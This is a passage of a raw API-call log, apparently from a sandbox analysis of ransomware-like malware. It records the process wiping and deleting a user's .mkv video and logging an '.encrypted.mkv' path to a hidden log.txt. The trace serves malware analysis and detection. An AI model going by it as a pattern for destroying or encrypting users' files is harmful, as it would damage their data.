0xf [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.362] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0042.362] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.362] FreeLibrary (hLibModule=0x754b0000) returned 1 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0042.363] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0042.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.364] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cd467f0, ftCreationTime.dwHighDateTime=0x1d5bbff, ftLastAccessTime.dwLowDateTime=0xabbcf130, ftLastAccessTime.dwHighDateTime=0x1d5b818, ftLastWriteTime.dwLowDateTime=0xabbcf130, ftLastWriteTime.dwHighDateTime=0x1d5b818, nFileSizeHigh=0x0, nFileSizeLow=0x1340, dwReserved0=0x0, dwReserved1=0x777648, cFileName="E- koDk.mkv", cAlternateFileName="E-KODK~1.MKV")) returned 0x7c2100 [0042.364] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.364] CharLowerBuffW (in: lpsz="byte[4928]", cchLength=0xa | out: lpsz="byte[4928]") returned 0xa [0042.364] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.364] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.364] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.364] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.365] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0042.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.365] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.365] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.366] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\e- kodk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0042.366] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0042.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.366] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.366] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.367] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.367] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.367] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.367] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.367] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", lpFilePart=0x0) returned 0x37 [0042.367] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cd467f0, ftCreationTime.dwHighDateTime=0x1d5bbff, ftLastAccessTime.dwLowDateTime=0xabbcf130, ftLastAccessTime.dwHighDateTime=0x1d5b818, ftLastWriteTime.dwLowDateTime=0x18f61b00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1340, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="E- koDk.mkv", cAlternateFileName="E-KODK~1.MKV")) returned 0x7c2100 [0042.368] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\e- kodk.mkv")) returned 1 [0042.369] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cd467f0, ftCreationTime.dwHighDateTime=0x1d5bbff, ftLastAccessTime.dwLowDateTime=0xabbcf130, ftLastAccessTime.dwHighDateTime=0x1d5b818, ftLastWriteTime.dwLowDateTime=0x18f61b00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1340, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="E- koDk.mkv", cAlternateFileName="E-KODK~1.MKV")) returned 0 [0042.369] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.370] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0042.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0042.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0042.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.370] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.370] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.371] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.371] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.371] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.371] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0042.371] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.372] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.372] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.372] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.372] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.372] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.373] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3449, lpOverlapped=0x0) returned 1 [0042.373] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.373] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3449, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.373] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0042.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.encrypted.mkv\r\n", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0042.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0042.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.encrypted.mkv\r\n", cchWideChar=68, lpMultiByteStr=0x88e138, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\E- koDk.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 68 [0042.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0042.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0042.374] WriteFile (in: hFile=0x140, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x43, lpOverlapped=0x0) returned 1 [0042.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0042.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.374] CloseHandle (hObject=0x140) returned 1 [0042.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.376] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.376] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 